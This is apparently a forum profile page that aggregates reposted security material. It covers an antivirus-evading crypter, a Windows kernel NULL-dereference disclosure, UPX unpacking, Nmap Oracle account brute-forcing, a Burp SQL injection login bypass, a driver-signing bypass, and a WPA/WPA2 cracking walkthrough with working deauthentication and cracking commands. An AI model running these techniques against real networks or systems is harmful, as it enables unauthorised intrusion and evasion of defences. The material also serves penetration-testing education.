Nytro

Everything posted by Nytro

  1. From: rage <ragesploit () 0xrage com>
     Date: Wed, 21 May 2014 23:13:20 -0400

     I've written and released a packer/crypter called rcrypt that might be fun for some of you to play around with. The latest public version is 1.4, although there is a functional, non-public version 1.5 currently in progress.

     The general summary is as follows: rcrypt is a Windows PE binary crypter (a type of packer) that makes use of timelock techniques to cause a delay in execution. This delay can cause analysis to fail on time-constrained systems such as on-disk scanners. rcrypt can pack EXE and DLL files. It bypasses KAV and many others.

     I'm always interested in feedback and suggestions/criticisms. There are many other features and functions as well!

     Released on my site: rcrypt v1.4 released | 0xrage
     Writeup also available: rcrypt packer writeup | 0xrage

     enjoy!
     - rage

     Source: Full Disclosure: rcrypt packer/crypter writeup and POC tool
  2. From: Tavis Ormandy <taviso () cmpxchg8b com>
     Date: Wed, 21 May 2014 11:57:31 -0700

     Apparently I'm being lured into pointless discussions today, so here's another.

     As I'm sure everyone is aware, Microsoft introduced basic NULL page mitigations for Windows 8 (both x86 and x64), and even backported the mitigation to Vista+ (on x64 only). There are some weaknesses, but this is a topic for another time.

     Interestingly, on Windows 8 x86 there is an intentional exception: if an Administrator has installed the 16-bit subsystem, the mitigation is worthless, because you can run your exploit in the context of NTVDM (simply use the technique I documented in CVE-2010-0232, Windows NT - User Mode to Ring 0 Escalation Vulnerability).

     An Administrator can do this either on demand by running a 16-bit program, e.g.

     C:\> debug

     Or by using fondue to install it manually:

     C:\> fondue /enable-feature:ntvdm /hide-ux:all

     Let's look at an example of a NULL dereference. It's obvious from the code that win32k!GreSetPaletteEntries doesn't validate that the MDCOBJA call succeeds in the HDC list traversal, resulting in a very clean NULL dereference.

     .text:001EAF49    lea     esi, [ebp+var_2C]                        ; out pointer
     .text:001EAF4C    call    ??0MDCOBJA@@QAE@PAUHDC__@@@Z             ; MDCOBJA::MDCOBJA(HDC__ *)
     .text:001EAF51    push    1
     .text:001EAF53    mov     edx, edi
     .text:001EAF55    call    _GreGetObjectOwner@8                     ; GreGetObjectOwner(x,x)
     .text:001EAF5A    mov     esi, eax
     .text:001EAF5C    call    ds:__imp__PsGetCurrentProcessId@0        ; PsGetCurrentProcessId()
     .text:001EAF62    and     eax, 0FFFFFFFCh
     .text:001EAF65    cmp     esi, eax
     .text:001EAF67    jnz     short loc_1EAFBA
     .text:001EAF69    and     [ebp+ms_exc.registration.TryLevel], 0
     .text:001EAF6D    mov     eax, [ebp+var_2C]                        ; load pointer
     .text:001EAF70    mov     ecx, [eax+38h]                           ; NULL dereference
     .text:001EAF73    mov     eax, [ecx+4]

     For comparison, callers like GreIsRendering, GreSetDCOrg, GreGetBounds, etc. check correctly. This better code is from win32k!GreSetDCOrg:

     .text:00213DA2    lea     esi, [ebp+var_C]                         ; out pointer
     .text:00213DA5    xor     ebx, ebx
     .text:00213DA7    call    ??0MDCOBJA@@QAE@PAUHDC__@@@Z             ; MDCOBJA::MDCOBJA(HDC__ *)
     .text:00213DAC    mov     edi, [ebp+var_C]                         ; load result
     .text:00213DAF    test    edi, edi                                 ; check for NULL
     .text:00213DB1    jz      short loc_213E15                         ; error

     This bug can be triggered with typical resource exhaustion patterns (see my exploit for CVE-2013-3660 for reference: Windows NT - Windows 8 EPATHOBJ Local Ring 0 Exploit). However, I have also stumbled onto a Windows 8 specific technique that does not require resource exhaustion, using the (undocumented) Xferable object flag.

     See the attached code (the testcase is specific to Windows 8+ on x86, although the bug affects other versions and platforms).

     This seems exploitable on 32-bit systems prior to Windows 8, but on Windows 8 it's only exploitable (ignoring mitigation failures) with NTVDM configured. It's my understanding that Microsoft no longer considers this a supported configuration, and is only interested in fixing NULL page mitigation bypasses.

     I'm not convinced this is a reasonable stance. What do other people think?

     Tavis.

     P.S. I think Linux introduced its mmap_min_addr mitigation to stable around 2007? Seven years' lag, I guess that's the power of the SDL ;-)

     --
     taviso () cmpxchg8b com | pgp encrypted mail preferred

     Attachment: SetPalette.c

     Source: Full Disclosure: NULL page mitigations on Windows 8 x86
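The contrast between the two call sites in the mail above can be modelled outside the kernel. The following Python sketch is an illustration only: `DC`, `lookup_dc` and the `palette` field are hypothetical stand-ins rather than win32k structures, and `None` plays the role of the NULL out pointer left behind when the `MDCOBJA` lookup fails.

```python
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class DC:
    """Hypothetical stand-in for the object the out pointer refers to."""
    palette: int


def lookup_dc(handle: int, table: Dict[int, DC]) -> Optional[DC]:
    """Return the object for a handle, or None when the lookup fails."""
    return table.get(handle)


def set_palette_unchecked(handle: int, table: Dict[int, DC]) -> int:
    # Pattern of GreSetPaletteEntries: the lookup result is used directly.
    dc = lookup_dc(handle, table)
    return dc.palette  # fails when dc is None (the "NULL dereference")


def set_dc_org_checked(handle: int, table: Dict[int, DC]) -> Optional[int]:
    # Pattern of GreSetDCOrg: test the lookup result before touching it.
    dc = lookup_dc(handle, table)
    if dc is None:
        return None  # error path, nothing is dereferenced
    return dc.palette
```

In Python the unchecked variant merely raises `AttributeError`. In the kernel code the same mistake reads from an address inside the NULL page, which is why it matters whether user mode is able to map that page.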
  3. Manual Unpacking of UPX using OllyDbg

     Introduction

     In this tutorial, you will learn how to unpack a UPX-packed executable file using OllyDbg. UPX is a free, portable executable packer for several different executable formats. It achieves an excellent compression ratio and offers very fast decompression.

     Here we will do live debugging with OllyDbg to fully unpack the packed file and reproduce the original executable from it.

     Packing EXE using UPX

     To start with, we need to pack a sample EXE file with UPX. Download the latest UPX packer from the UPX website, then use the following command to pack your sample EXE file.

     upx -9 c:\sample.exe

     If you already have a UPX-packed binary, proceed further. In that case, use PEiD or 'RDG Packer Detector' to confirm that it really is packed with UPX.

     UPX Unpacking Process

     Before we begin with the unpacking exercise, let's try to understand how UPX works. When you pack an executable with UPX, all existing sections (text, data, rsrc etc.) are compressed. The resulting sections are named UPX0, UPX1 etc. UPX then adds a new code section at the end of the file, which decompresses all the packed sections at execution time.

     Here is what happens during the execution of a UPX-packed EXE file:

     1. Execution starts from the new entry point (in the newly added code section at the end of the file).
     2. The current register state is saved using the PUSHAD instruction.
     3. All the packed sections are unpacked in memory.
     4. The import table of the original executable file is resolved.
     5. The original register state is restored using the POPAD instruction.
     6. Finally, execution jumps to the Original Entry Point (OEP) to begin the actual program.

     Manual Unpacking of UPX

     Here are the standard steps involved in any unpacking operation:

     1. Debug the EXE to find the real OEP (Original Entry Point).
     2. At the OEP, dump the fully unpacked program to disk.
     3. Fix the import table.

     Depending on the type and complexity of the packer, the unpacking operation may vary in time and difficulty. UPX is a basic packer and serves as a great example for anyone who wants to learn unpacking.

     Here we will use OllyDbg to debug and unpack the UPX-packed EXE file. Although you can use any debugger, OllyDbg is one of the best ring 3 debuggers for reverse engineering, thanks to its useful plugins.

     Let's start the unpacking operation:

     1. Load the UPX-packed EXE file into OllyDbg.
     2. Start tracing the EXE until you encounter a PUSHAD instruction. Usually this is the first instruction, or it appears after the first few instructions, depending on the UPX version.
     3. When you reach the PUSHAD instruction, set a hardware breakpoint (type 'hr esp-4' in the command bar). This stops execution when the POPAD instruction reads the saved registers back later on. The other way is to search manually for the POPAD instruction (opcode 61) and set a breakpoint on it.
     4. Once the breakpoint is set up, continue the execution (press F9).
     5. Shortly, it will break either on the instruction immediately after POPAD or on the POPAD instruction itself, depending on the method you have chosen.
     6. Now start step-by-step tracing with F7. Soon you will encounter a JMP instruction that takes us to the actual OEP in the original program.
     7. When you reach the OEP, dump the whole program using the OllyDump plugin (use the default settings). It will automatically fix the import table as well.
     8. That is it, you have just unpacked UPX!

     Fixing Import Table

     In the current example, the OllyDump plugin takes care of fixing the import table. For most packers, however, we need a more advanced tool called ImpREC (Import Reconstructor). ImpREC provides multiple methods to trace the API functions and also allows writing custom plugins.

     For interested users, here are simple instructions on how to fix the import table using ImpREC:

     1. When you are at the OEP of the program, dump the memory image of the binary using OllyDump WITHOUT asking it to fix the import table.
     2. Launch ImpREC and select the process that you are currently debugging.
     3. In ImpREC, enter the actual OEP (enter only the RVA, not the complete address).
     4. Click the 'IAT Autosearch' button to search for the import table automatically.
     5. Click 'Get Imports' to retrieve all the imported functions.
     6. You will see all the imported functions listed under their respective DLL names.
     7. If you find an import function that is invalid (marked as VALID: NO), remove it by right-clicking on it and choosing 'Delete Thunks' from the popup menu.
     8. Once all the import functions are identified, click the 'Fix Dump' button in ImpREC and select the file previously dumped from OllyDbg.
     9. Run the final fixed executable to check that everything is all right.

     For advanced packers, you may have to use different methods in ImpREC and sometimes need to write your own custom plugin to resolve the import table functions. For more interesting details, refer to our PESpin ImpREC plugin.

     Video Demonstration

     This video demonstration sets the hardware breakpoint in a slightly different way than described in the article. It also uses ImpREC to fix the import table, which is useful when unpacking advanced packers. Here are the steps shown in the video:

     1. Load your EXE in OllyDbg.
     2. Step over (shortcut F8) the PUSHAD instruction.
     3. Go to ESP (right-click and follow in the Dump window).
     4. Put a hardware read breakpoint (on access) on the first dword at ESP. (This is similar to 'hr esp-4' at the PUSHAD instruction, as described earlier.)
     5. Run the EXE until we hit the breakpoint (shortcut F9).
     6. It will break right after the POPAD instruction. You will see a JMP instruction a few lines below the current instruction. Put a breakpoint on the JMP.
     7. Run the EXE again until it stops at the JMP instruction (shortcut F9).
     8. Step over the JMP (shortcut F8).
     9. Now we are at the OEP. Dump the process using OllyDump without fixing the import table.
     10. Use ImpREC to fix the import table, as described in the 'Fixing Import Table' section.
     11. Finally, after fixing the import table, run the new unpacked EXE to make sure it works.

     References

     • UPX: Ultimate Packer for Executables
     • OllyDbg: Popular Ring 3 Debugger
     • ImpREC: Import Table Reconstruction Tool
     • PESpin Plugin for ImpREC
     • RDG Packer Detector
     • PEiD Packer Detector

     Source: Manual Unpacking of UPX Packed Binary File - www.SecurityXploded.com
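Two details of the tutorial above lend themselves to a short script: the UPX0/UPX1 section names that packer detectors look for, and the "enter only the RVA" rule in ImpREC. The Python sketch below is a minimal illustration under stated assumptions, not how PEiD or ImpREC work internally. The function names and the `UPX_SECTION_NAMES` set are hypothetical, the section check is only a heuristic (section names can be renamed), and the image base has to be read from the debugger or the PE header.

```python
import struct

# Hypothetical heuristic: section names that UPX typically leaves behind.
UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}


def pe_section_names(data: bytes) -> list:
    """Return the section names from the section table of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    # e_lfanew (offset 0x3C of the DOS header) points to the PE signature.
    (pe_offset,) = struct.unpack_from("<I", data, 0x3C)
    if data[pe_offset:pe_offset + 4] != b"PE\x00\x00":
        raise ValueError("PE signature not found")
    # COFF header follows the signature: NumberOfSections at +6,
    # SizeOfOptionalHeader at +20 (both relative to the signature).
    (num_sections,) = struct.unpack_from("<H", data, pe_offset + 6)
    (opt_size,) = struct.unpack_from("<H", data, pe_offset + 20)
    table = pe_offset + 24 + opt_size  # section table follows the optional header
    names = []
    for i in range(num_sections):
        raw = data[table + i * 40: table + i * 40 + 8]  # 40-byte entries, 8-byte name
        names.append(raw.rstrip(b"\x00").decode("ascii", errors="replace"))
    return names


def looks_upx_packed(section_names: list) -> bool:
    """True if any section carries one of the typical UPX names."""
    return any(name in UPX_SECTION_NAMES for name in section_names)


def va_to_rva(virtual_address: int, image_base: int) -> int:
    """Convert the OEP shown in the debugger into the RVA that ImpREC expects."""
    return virtual_address - image_base
```

For example, with an image base of 0x00400000 and a jump target of 0x00401000 in the debugger, `va_to_rva(0x00401000, 0x00400000)` gives 0x1000, which is the value to type into the OEP field.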
  4. Discovering Oracle Accounts With Nmap

     If we are conducting an infrastructure penetration test and we discover an Oracle database during the information gathering stage, we can use Nmap to perform some checks that may reveal the accounts that exist on the database. These checks are carried out by two scripts that ship with the Nmap Scripting Engine:

     • oracle-sid-brute
     • oracle-brute

     The Oracle listener runs on port 1521 by default, so in most cases we can identify an Oracle database just by checking whether this port is open on the target host. The next step is to run the oracle-sid-brute script, which tries to brute-force common Oracle SIDs. In the example run, the script successfully identified the SID as XE.

     Figure: Brute forcing Oracle SIDs with Nmap

     Now that we know the SID of the Oracle database, we can run the oracle-brute script with that SID name to discover the valid accounts.

     Figure: Discovering Oracle accounts

     Conclusion

     With these two scripts we can perform security audits against an Oracle database with Nmap. The drawback, as the output of the second run indicates, is that we can lock accounts: the script does not limit the number of attempts it makes, so it does nothing to prevent account lockout. On the other hand, it is a very fast way to detect Oracle accounts with Nmap during information gathering.

     Source: Discovering Oracle Accounts With Nmap | Penetration Testing Lab
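Since the screenshots with the actual command lines are not reproduced here, the following Python sketch shows how the two runs could be assembled. It is an assumption-laden illustration: the helper names and the target address 192.0.2.10 (a documentation-only address) are hypothetical, while `oracle-sid-brute`, `oracle-brute` and the `oracle-brute.sid` script argument are the names used by the Nmap scripts themselves. The sketch only builds the argument lists and does not launch a scan.

```python
def sid_brute_command(host: str, port: int = 1521) -> list:
    """Argument list for guessing the SID with the oracle-sid-brute script."""
    return ["nmap", "-p", str(port), "--script", "oracle-sid-brute", host]


def account_brute_command(host: str, sid: str, port: int = 1521) -> list:
    """Argument list for guessing accounts once the SID is known."""
    return [
        "nmap", "-p", str(port),
        "--script", "oracle-brute",
        "--script-args", "oracle-brute.sid=" + sid,
        host,
    ]


if __name__ == "__main__":
    # Print the commands instead of running them; only scan hosts you are
    # authorized to test, and keep the account lockout risk in mind.
    print(" ".join(sid_brute_command("192.0.2.10")))
    print(" ".join(account_brute_command("192.0.2.10", "XE")))
```

Keeping the commands as lists makes it straightforward to hand them to `subprocess.run` later without shell quoting problems.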
  5. SQL Injection Authentication Bypass With Burp

     Burp is a tool that can be used in every web application penetration test to perform a variety of activities and to automate tasks. As a penetration tester you will want to run some checks automatically, because this reduces the time spent on routine checks and leaves more time for the tricky parts of the assessment. One of the checks you must perform on a web application that contains a login form is to examine whether the form is vulnerable to SQL injection and, if it is, to try to bypass it and log in as administrator.

     To bypass authentication in a form that is vulnerable to SQL injection, we need to understand how the query is constructed and append the appropriate parameters to it. For a fast test before exploiting this manually, we can use Burp Intruder and a cheat sheet that was created for this purpose. Burp Intruder sends HTTP requests, placing each entry from the list at a specific position in the request. This article examines that method, using Mutillidae, which contains this vulnerability, as the target application.

     The first thing to do is, of course, to find out whether the login form is vulnerable. We can simply insert a single quote (') in the username field and watch the response. If the application returns a SQL error, it is likely to be vulnerable.

     Figure: SQL injection error

     Next we capture the HTTP request with Burp Proxy and send it to Intruder. In Intruder there are two things to set: the attack type and the payload position. The attack type must be Sniper, because in this mode Burp Intruder takes a single input from a list that we provide later and sends it at the position we specify in the HTTP request (one input at a time). For the position, we choose the field that is vulnerable (in this case the username).

     Figure: Burp Intruder, attack type and position

     The next thing to do is to set the payloads. The payload type for this attack is a simple list, so in the payload options we load our .txt list.

     Figure: Burp Intruder, setting up the payloads

     Now the attack is ready to be launched. Burp Intruder passes each entry from the list to the payload position and sends it to the web application as an HTTP request. When the run finishes, the successful payloads stand out because their responses have a different status code.

     Figure: SQL injection authentication bypass, Burp payloads

     Now we can go back to the application and use one of the successful payloads to bypass the authentication and log in to the application with admin privileges.

     Figure: Bypassing authentication by passing the correct payload

     Conclusion

     This was a simple tutorial that showed some of Burp's major capabilities against web applications, as we managed to log in to the application as admin. The SQL injection authentication bypass cheat sheet used in this article was developed by Dr. Emin İslam Tatlı, and all credit goes to him. If you want to use the list or to expand it you can find it here.

     Source: SQL Injection Authentication Bypass With Burp | Penetration Testing Lab
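Why a cheat-sheet payload logs us in is easier to see with the query in front of us. The sketch below is a self-contained illustration using an in-memory SQLite database. It is not Mutillidae's code: the `accounts` table, its columns, the credentials and both login functions are assumptions made for the example, and `' OR 1=1 -- ` is just one classic payload of the kind such lists contain.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create a throwaway in-memory database with a single admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
    conn.execute("INSERT INTO accounts VALUES ('admin', 's3cret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # User input is concatenated straight into the SQL text (the flaw).
    query = (
        "SELECT username FROM accounts WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders keep user input as data, never as SQL syntax.
    query = "SELECT username FROM accounts WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR 1=1 -- "
    # The payload closes the string, adds an always-true condition and
    # comments out the password check.
    print(login_vulnerable(conn, payload, "wrong"))
    print(login_parameterized(conn, payload, "wrong"))
```

With the vulnerable function, a lone `'` in the username field makes the database raise a syntax error, which corresponds to the error page used as the first vulnerability check. The parameterized version treats both inputs as plain strings.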
  6. [h=1]Defeating Driver Signing Enforcement, Not That Much Hard![/h]

     November 4, 2012

     These days everybody talks about Driver Signing Enforcement and the ways we can bypass it. J00ru talked about the hard way, and I will tell you about the easy and long-known way. All we need is a signed, vulnerable x64 driver.

     As we know, loading drivers requires administrator privileges, but these days a normal user with the default UAC setting can silently obtain Admin privileges without popping up a UAC dialog.

     The driver I am talking about is DCR from DriveCrypt. The x64 version is signed and is vulnerable to a write4 bug. The latest version is no longer vulnerable, but the vulnerable version still has a valid signature, and that is enough.

     I think it is obvious that the whole process can be automated programmatically: escalating privileges from normal user to Admin in order to load the vulnerable driver (silently, with one of the UAC bypass methods), followed by exploitation.

     You can find the vulnerable version of the driver along with the exploit at "DriveCrypt\x64\Release".

     Source: Defeating Driver Signing Enforcement, Not That Much Hard! | REP RET
  7. Troopers 14 - Easy Ways To Bypass Anti-Virus Systems - Attila Marosi

     Description: All IT security professionals know that antivirus systems can be evaded, but few of them know how easy it is to do. (If it is easy to do, its impact is huge!) In this presentation I will, on the spot, fully bypass several antivirus systems using basic techniques. I will bypass signature detection, emulation/virtualization, sandboxing and firewalls. How much development time is needed for this result? Not more than 15 hours, without a cent of investment! If I could do this, anyone can, so I think we have to focus on this problem. Using these easy techniques I can create a 'dropper' that delivers any kind of Metasploit (or other) shellcode, bypasses several well-known antivirus products in real life and fully evades VirusTotal.com with a detection rate of 0. In my presentation I use 6 virtual machines and 9 real-time demos. As a result, the audience always has great fun and is surprised to see the most well-known systems fail, and the challenges the AVs cannot solve are ridiculously simple and old. So IT professionals might want to think harder about the systems they rely on and which cost so much.

     Bypassed antivirus systems: F-Secure, AVG, NOD32 6 and 7, avast!, Kaspersky, Trend Micro, McAfee…

     Educational value of the topic:

     • We look at how virus writers develop their code.
     • We will develop a puzzle that can distract the AV virtualization engine to avoid detection.
     • We will develop code to encrypt/decrypt our malicious shellcode.
     • We will look at which built-in Windows functions help the attacker inject malicious code into a victim process, and we will try it. (We will use iexplore.exe to bypass the firewall.)
     • We will look at which solutions are often used to avoid the sandbox.
     • Learn the difference between metamorphic and polymorphic code. I wrote a Python script that creates a metamorphic version of a piece of byte code. We will test it in real time, and it will be clear that it is a real challenge for the AVs.

     BIO: Attila Marosi has worked in the information security field since the start of his career. As a lieutenant on active duty he worked for years on special information security tasks within the SSNS. He was recently transferred to the newly established GovCERT-Hungary, which is an additional national level in the internationally known system of CERT offices. He holds several international certificates, such as CEH, ECSA, OSCP and OSCE. In his free time he also gives lectures and teaches at different levels, above all for white hat hackers. He has presented at many security conferences, including Hacker Halted, DeepSEC and Ethical Hacking.

     For more information please visit: https://www.troopers.de

     Source: Troopers 14 - Easy Ways To Bypass Anti-Virus Systems - Attila Marosi
  8. How To Crack A Wpa/Wpa2 Wireless Network

     Description: In this video I will show you how to crack a WPA/WPA2 wireless network. We will need Kali Linux and a compatible wireless card that supports injection and promiscuous mode. For more information on promiscuous mode check out: Promiscuous mode - Wikipedia, the free encyclopedia. The recommended wireless card is an Alfa Network AWUS036H.

     To get started, we need to put our wireless card into monitor mode. To do that, open a terminal and type in:

     airmon-ng start wlan0

     Next we need to find the network we want the password for. First we need to capture the 4-way handshake! Open a new terminal and this time type in:

     airodump-ng mon0

     We should start to see networks showing up. Find the network you want to crack, then press CTRL+C to stop airodump-ng.

     Assuming you found the network you want to crack, we now need to get the 4-way handshake. In the terminal, type in:

     airodump-ng -c 1 --bssid 88:F7:C7:3A:D9:72 -w test mon0

     Change 88:F7:C7:3A:D9:72 to the BSSID of the target network you're trying to crack. Press Enter and we should now be watching just that network!

     To get the handshake we must deauthenticate a device or client that is already connected. If nothing shows up under STATION, we must wait until a wireless device shows up there, otherwise we can't get the handshake. Basically, it is a waiting game until a wireless device is connected.

     Assuming you see a device listed under STATION, we can then send a deauthentication using aireplay-ng. Open a new terminal and type in:

     aireplay-ng -0 1 -a 88:F7:C7:3A:D9:72 -c D8:50:E6:84:6C:74 mon0

     Change 88:F7:C7:3A:D9:72 to the BSSID of the target network and D8:50:E6:84:6C:74 to the victim's MAC address under STATION.

     Once we have the handshake, it's time to try cracking it! First you're going to need a wordlist, so happy hunting! There are tons of them out there; some might work, some might not. For this video I have added my own password to a wordlist to keep it ethical.

     Got your wordlist? Let's move on to the next step: CRACKING! Open a terminal and type in:

     aircrack-ng -w /path/to/wordlist/list.txt test-01.cap

     Assuming you didn't use the same name (e.g. test) more than once, the capture is test-01.cap; otherwise you will see several files in /root/ called test-01.cap, test-02.cap, etc.

     Press Enter and happy cracking. Good luck: you likely have a better chance of getting hit by lightning on a nice day than of getting the password. I recommend you try some online WPA cracking services for a better outcome. Some sites, like https://www.cloudcracker.com/, charge $17 USD to try to crack it for you!

     Be sure to check out Matthew H Knight – Internet Security Professional

     Source: How To Crack A Wpa/Wpa2 Wireless Network
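The reason a wordlist is needed at all is that a WPA/WPA2-PSK passphrase is never sent over the air; each candidate has to be run through a slow key derivation and checked against the captured handshake. The Python sketch below shows the derivation step only, using the standard PBKDF2-HMAC-SHA1 construction with the SSID as salt, 4096 iterations and a 256-bit result. It is a simplified illustration: `wpa_pmk` and `first_matching_passphrase` are hypothetical names, and comparing against a known PMK stands in for the real check, in which a cracker derives further keys from the handshake nonces and MAC addresses and verifies the handshake MIC.

```python
import hashlib
from typing import Iterable, Optional


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the 256-bit pairwise master key from a passphrase and an SSID."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), 4096, 32
    )


def first_matching_passphrase(
    wordlist: Iterable[str], ssid: str, target_pmk: bytes
) -> Optional[str]:
    """Return the first candidate whose derived key equals target_pmk.

    Simplification: a real attack checks the handshake MIC rather than
    comparing PMKs, because the PMK itself is not in the capture.
    """
    for candidate in wordlist:
        # WPA passphrases are 8 to 63 characters long; skip anything else.
        if 8 <= len(candidate) <= 63 and wpa_pmk(candidate, ssid) == target_pmk:
            return candidate
    return None
```

Because every guess costs 4096 HMAC iterations and the SSID acts as a salt, the search is slow and cannot be precomputed across networks with different names, which is why success depends entirely on the password being in the wordlist.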
  9. Windows 7 Security Features

     Windows 7 is an operating system developed and released by Microsoft in 2009. It was designed as the successor to Windows Vista. Windows 7 builds upon the features and design philosophies of Windows Vista and adds several enhancements along the way. It primarily targets home and office users and is available in both 32-bit and 64-bit (x64) editions. Design-wise, Windows 7 is very similar to its predecessor, Windows Vista, but it adds enhancements such as Libraries and Jump Lists.

     Security in Windows

     Windows-based operating systems have long been plagued by security flaws and vulnerabilities, mainly because the early systems were not designed with secure computing in mind. These flaws also make them a popular target for attackers. In today's increasingly connected world, a compromised system has dire consequences. Windows 7 tries to address these issues by following Microsoft's Security Development Lifecycle (SDL): developers enforced a strict code review of all new code and refactored and reviewed older OS code. Several of the major security improvements are described below in greater detail.

     1. Data Execution Prevention (DEP)

     While a process runs, many of its memory regions (such as the stack and the heap) hold data rather than executable code. Attackers use bugs such as buffer overflows to inject code into these regions and then redirect execution to it. Data Execution Prevention is a security technique that prevents code from being executed from such data pages. This is done by marking data pages as non-executable, which makes it harder to run code from those memory locations. DEP is intended to be used together with other mechanisms such as ASLR and SEHOP. Used together, they make it very difficult for attackers to exploit an application through memory attacks.

     By default, Windows 7 runs DEP in opt-in mode: it protects Windows system components and those applications that opt in, and users are encouraged to extend it further. DEP can be enabled system-wide or on a per-application basis. This is configured by the system administrator.

     DEP types

     There are two DEP implementations:

     • Hardware-enforced DEP
     • Software-enforced DEP

     Hardware-enforced DEP

     Hardware-enforced DEP treats all memory locations as non-executable by default unless a location explicitly contains executable code. This helps prevent attacks that try to run code from non-executable memory locations. Hardware DEP uses the processor to mark memory as non-executable, by setting an attribute bit on the memory page concerned. It requires a DEP-compatible processor, and both AMD and Intel have released processors with DEP support. AMD processors use the NX (no-execute) bit to mark non-executable sections of memory; Intel processors use the XD (execute disable) bit for the same purpose.

     Software-enforced DEP

     Software-based DEP is less complex than its hardware-dependent variant, and it also has limited functionality. It runs on any type of processor that can run Windows 7, but it protects only a limited number of system binaries. Software-based DEP helps defend against attacks that abuse the exception handling mechanism in Windows 7.

     DEP in other Operating Systems

     DEP is found in other operating systems as well; most of them rely on hardware-enforced DEP, and the details vary with the processor used.

     • RedHat/CentOS Linux supports DEP through Exec Shield. It is enabled by default.
     • Sun Solaris supports hardware-enforced DEP on NX/XD-enabled x86 systems. This setting must be enabled.
     • Apple Mac OS X supports DEP on Intel processors using the XD bit. It is enabled by default.
     • Android 2.3 and above support DEP.
     • FreeBSD has supported DEP from version 5.3 onwards.
     • OpenBSD supports DEP through a custom implementation called W^X, which marks pages as non-executable by default. W^X uses the NX bit for its implementation; support for the XD bit is still forthcoming. W^X has been available from OpenBSD version 3.3 onwards.

     2. Address Space Layout Randomization (ASLR)

     Address space layout randomization is a technique that increases security against common memory-based attacks such as buffer overflows and stack smashing. In older versions of Windows, essential system processes often used predictable memory locations. This made it much easier for attackers to find critical components of a process, including the program stack and heap, and to use these addresses to launch buffer overflow attacks.

     ASLR was devised to overcome this problem. It randomizes the location of several parts of the program, such as the stack, heap and libraries, which makes memory addresses much harder to predict. Coupling ASLR with DEP makes it extremely difficult to carry out memory-based attacks.

     To use ASLR, programs must be built with the ASLR flag (the /DYNAMICBASE option of Microsoft's linker); only then does randomization occur at program runtime. Windows 7 fully supports ASLR-enabled applications and libraries, and this support is included in all Windows systems from Windows Vista onwards.

     ASLR in other Operating Systems

     ASLR is not restricted to Windows; it is found in other operating systems as well.

     • Linux supports a weaker form of ASLR, but it is present by default.
     • OpenBSD enables ASLR by default.
     • Mac OS X supports memory randomization by default for system libraries and for applications that have been compiled with ASLR support.
     • FreeBSD does not fully support ASLR yet, but it is in development.
     • DragonFly BSD supports ASLR; its implementation is based on OpenBSD's.
     • Android 4.0 (Ice Cream Sandwich) supports ASLR to protect system and third-party applications from memory exploits.

     3. Structured Exception Handler Overwrite Protection (SEHOP)

     Structured Exception Handler Overwrite Protection (SEHOP) is a technique used to prevent malicious users from exploiting Structured Exception Handler (SEH) overwrites. The SEH overwrite exploit was first demonstrated on Windows XP, and it has since become one of the most popular exploits in the attacker's arsenal. Several exploit frameworks, including Metasploit, use SEH overwrite techniques to execute code remotely.

     SEH overwrite exploits work by subverting the 32-bit exception mechanism provided by the Microsoft operating system. They are generally carried out by using a stack-based buffer overflow to overwrite an exception registration record stored on the thread's stack. The exception registration record consists of two fields: the next pointer and the exception handler, also called the exception dispatcher. The attacker tries to overwrite the exception handler and then force an exception.

     There are two methods to stop SEH exploits. The first requires the application to be built with the /SAFESEH flag during the linking phase. This may not be feasible, because it requires rebuilding the entire application. The second method is the one used by SEHOP: dynamic checks ensure that a thread's exception handler list is not corrupt before the exception handler is actually called.

     SEHOP is included in Windows 7. On Windows Server 2008 and 2008 R2 it is enabled by default, whereas on the Windows 7 and Vista client editions it ships disabled; the setting is changed through registry keys.

     4. User Account Control (UAC)

     User Account Control is a security feature first introduced in Windows Vista to restrict administrative privileges to authorized users. If an application tries to perform an administrative action, the user must approve it or authenticate before the action is carried out.
This is useful, as it prevents malicious files from executing actions with administrative privileges. UAC works by allowing temporary administrative access to the concerned user if he/she is able to authenticate themselves during the UAC prompt. There are several actions that can trigger a UAC alert. Some of them are listed below: Running an Application as an Administrator Changes to system-wide settings or to files in %SystemRoot% or %ProgramFiles% Installing and uninstalling applications Installing device drivers Installing ActiveX controls Changing settings for Windows Firewall Changing UAC settings Configuring Windows Update Adding or removing user accounts Changing a user’s account type Configuring Parental Controls Running Task Scheduler Restoring backed-up system files Viewing or changing another user’s folders and files UAC also introduces the concept of Secure Desktop, wherein the entire desktop is dimmed during a UAC prompt, forcing the user to only interact with the elevation window. Normal applications cannot interact with the secure desktop. This prevents spoofing attacks. UAC is enabled by default, but can be disabled from the Control Panel, but it is not advisable to do so. UAC is similar in functionality to the sudo command found in UNIX based systems. 5. DNS System Security Enhancements (DNSSEC) The DNS System Security Enhancements is a set of specifications used to secure information provided by the DNS system. The specification was devised by the IETF (Internet Engineering Task Force). DNSSEC support was first introduced to Windows 7 and Windows Server 2008 R2. DNSSEC works through the use of extensions to improve upon the shortcomings of the DNS system to provide DNS clients with certain features such as: Origin authentication of data Authentication Data integrity The original DNS system was not designed with security in mind, this has led to heavy exploitation of DNS systems. 
DNSSEC tries to add security without sacrificing backward compatibility. DNSSEC makes use of public key cryptography to digitally sign records for DNS lookup. The correct DNS record is authenticated using a chain of trust, which starts from a set of verified keys for the DNS root zone; the root zone acts as the trusted third party.

DNSSEC in other Operating Systems

DNSSEC is supported in many other operating systems.
BIND, the most popular DNS name server, supports the latest version of the DNSSEC protocol.
The Google public DNS server fully supports the DNSSEC protocol.

6. Bitlocker

